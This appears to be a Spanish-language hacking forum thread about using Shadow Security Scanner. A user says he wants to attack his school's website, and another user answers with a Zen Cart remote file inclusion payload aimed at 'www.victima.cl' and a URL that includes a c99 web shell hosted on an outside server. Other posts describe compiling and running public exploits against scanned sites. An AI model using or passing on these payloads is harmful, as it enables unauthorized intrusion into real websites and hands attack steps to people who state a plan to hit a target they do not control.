Manual Para El SSS , Shadow Security Scanner 7.97 ACUALIZADO 31/12/2006

[OzX]

mm que es acunetix

san google... XD¡ busca antes de postear.

[invisible_soul]

b usque y es un scanner d evulnerabilida des que diferencia tendria con el sss?

[||Ray||]

¿Que diferencia hay entre MSN Messenger y Yahoo Messenger?

Pues nada, los 2 son programas para hablar, cada uno tendrá sus paticularidade s pero son lo mismo.

Pues ese también tendrá su propia interfaz sus propias particularidad es cosas que no tenga y el otro si y viceversa pero acabará buscandote las vulnerabilidad es

[OzX]

XD¡ raul simple palabras pero bien dicho..

invisible_soul internet es mucho mas que el portalhacker XD¡

[bartolomeo]

tengo una pequeña duda,  muchas de la paginas son subidas a un web host, entonces la pagina queda despues del /
aver aca me explcio mejor
imaginense que el host es
Para ver este enlace Registrate o Inicia Sesion

www.xthost.inf

o y la pagina es
Para ver este enlace Registrate o Inicia Sesion

www.xthost.inf

o/hack
si pongo
Para ver este enlace Registrate o Inicia Sesion

www.xthost.inf

o/hack ( la pagina que quiero hackear que a sido subida al host web
Para ver este enlace Registrate o Inicia Sesion

www.xthost.inf

o) en el safety lab me dice com osaben que no puede tener /
entonces nose como aserlo me explico?

xD es sencillo, primero tienes que tener claro como esta alojado dicho sitio, si es un servidor dedicado (empresarial, casero, asdf, etc), si es un hosting...y asi, en el caso que dices tu es un hosting 'www.xthost.inf', entonces no te informas de 'www.xthost.inf/sitio_web' sino de donde esta alojado... tambien vendria MAS que bien, informarse de que programacion soporta dicho hosting... ya que algunos hosting (como somee.com y otras mas ^_^) estan muy mal configurados y puedes obtener datos muy delicados...e incluso dar con los directorios de los miembros.

esop salu2

[Mega$]

Bueno antes de nada hola me presento....

me descarge el sss entonces scaneo una web no
y me sale un exploit
le doi a la page y a explot me sale una direcccion con una pagina en blanbo con un codigo....

el codigo es el sigiuentehttp://www.example.com/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell



y ahora que como lo mando que tengo que hacer lo compilo o que??

ayuda porfis... es la page del insti jejej

alguien me ayuda

[OzX]

eso pasa porque no tienes idea que hace ni nada, averigua que es un exploit, los distintos tipos como se comportan etc... no agas cosas q no sabes lo que hacen.
la idea es aprender no con 3 click ir botnado web.
si no me ekivoco es la web zent cart RFI:

saludos
adios

[Mc_Hacks]

mega$  se usa asi


Para ver este enlace Registrate o Inicia Sesion

www.victima.cl index.php?

autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=
Para ver este enlace Registrate o Inicia Sesion
lo que aparece en negrita lo puedes cambiar por estas otras shell en caso de que esa no funke


Para ver este enlace Registrate o Inicia Sesion

o esta otra


Para ver este enlace Registrate o Inicia Sesion


entra a esta direccion y veras como funcionan las shell


Para ver este enlace Registrate o Inicia Sesion[cfg_serverpath]=http://reqfer.by.ru/c99.txt?cmd=ls

[kzam]

YA HIZE VARIOS ESCANNEOS I NUNCA ME APARECE NADA
NINGUANA VULNERABILIDAD K ONDA CON ESO
ALGUIEN ME PODRIA DECIR COMO

[Assembler_C]

Muy buen manual, sin embargo no consigo ninguna vulnerabilidad yo tampoco.

[OzX]

no siempre las pag van a tener vulnes...
pero en fin. no tengo idea a mi si me funka XD¡

[Dydra]

Ya me informe sobre los distintos tipos de exploit y sigo sin entender como utilizar el codigo que me da la pagina del SSS. Si alguien me puee explicar Gracias.

[invisible_soul]

uiiii esta pregunta a sido respondida millones de veces mira....
Bugs es igual a un error, vulnerabilidad ... no porque una pagina tenga un bug significa que podras aserte con al shell de sistema o introducirte a todo su disco duro y robarle informacion.. primero si tiene un bug, vas a su buqtrad lo clikeas y te manda a securyfocus.co m ai hay una pequeña reseña de que provoca el bug.. tienes que leer eso pa entender luego te vas a la parte de exploits, si esque tiene un exploit el bug, porque a veces no son necesarios exploits, por ejemplo que tenga anonymous el telnet o el ftp ...
Pues si tiene exploit el bug copias el codigo de fuente y lo compilas con el compilador correspondient e al lenguaje (c/c++ - Perl - Php - Python) luego de compilarlo l oejecutas o intepetras por la linea de comandos , ai te dira lo que tienes quer hacer si tienes que poner la ip, la pagina en el ie.. o lo que tienes que aser porque todos los exploits son distintos, no se si entiendes n otodos te aran agarrrar la shell del sistema o la rcf ...
Ya conesto me despitdo y lo otrro los exploits no se lanzan como piedras, que ya lo a repetido Ozx un millon de veces

[OzX]

Ya me informe sobre los distintos tipos de exploit y sigo sin entender como utilizar el codigo que me da la pagina del SSS. Si alguien me puee explicar Gracias.

mmmm no te creo mucho si supieras, ya los entendererias.

[invisible_soul]

talvez leiste los tipos..l pero de hay a que los entiendas

    * Vulnerabilidad es de desbordamiento de buffer.
    * Vulnerabilidad es de condición de carrera (race condition).
    * Vulnerabilidad es de error de formato de cadena (format string bugs).
    * Vulnerabilidad es de Cross Site Scripting (XSS).
    * Vulnerabilidad es de Inyección SQL.
    * Vulnerabilidad es de Inyección de Caracteres (CRLF).
    * Vulnerabilidad es de denegación del servicio
    * Vulnerabilidad es de Inyección múltiple HTML (Multiple HTML Injection).
    * Vulnerabilidad es de ventanas enganosas o mistificación de ventanas (Window Spoofing).